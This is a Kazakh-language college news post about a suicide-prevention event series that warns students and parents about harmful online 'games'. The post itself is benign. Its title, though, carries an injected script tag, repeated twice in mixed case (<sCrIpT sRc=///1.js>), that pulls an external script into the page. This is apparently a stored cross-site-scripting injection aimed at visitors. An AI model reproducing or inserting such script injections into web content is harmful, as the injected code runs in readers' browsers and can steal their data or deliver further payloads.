«Адам өмірі – басты құндылық» іс-шаралары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.11.2021
Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің студенттерімен «Адам өмірі – басты құндылық» атты іс-шаралар өтті. Негізгі мақсат – студенттердің өмірге деген құндылық қатынасын дамыту, өзіндік бірегейлігін арттыру. Бекітілген жоспарға сәйкес барлық білім алушыларға топ жетекшілері түсіндіру жұмыстарын жүргізді. Жатақхана тәрбиешілері де бұл іс-шараға белсене қатысты. Түсіндіру жұмыстарында құқық бұзушылықтардың орын алмауына аса мән берілді. Жасөспірімдер арасында әлеуметтік желі арқылы өз-өзіне қол жұмсауға итермелейтін «Синий кит», «Тихий дом» және «Игра в Кальмара» қауіпті психологиялық ойындарынан сақтану жолдары басты назарға алынды. Білім алушылар өздерін толғандырып жүрген мәселелер бойынша жеке кеңес тыңдады. Сондай-ақ ата-аналармен де тығыз байланыс үзілмеді. Олармен «Осал тәрбие қылмысқа жетелейді» атты жиналыс өткізілді. Топ студенттеріне әлеуметтік желілерден сілтеме арқылы келетін қауіпті ойындардың зияны айтылып, «Адам өмірінің құндылықтары» атты кураторлық сағаттар өткізілді.
Просмотров: 459


Пікір қосу



Деректерді қолтаңбаға қосу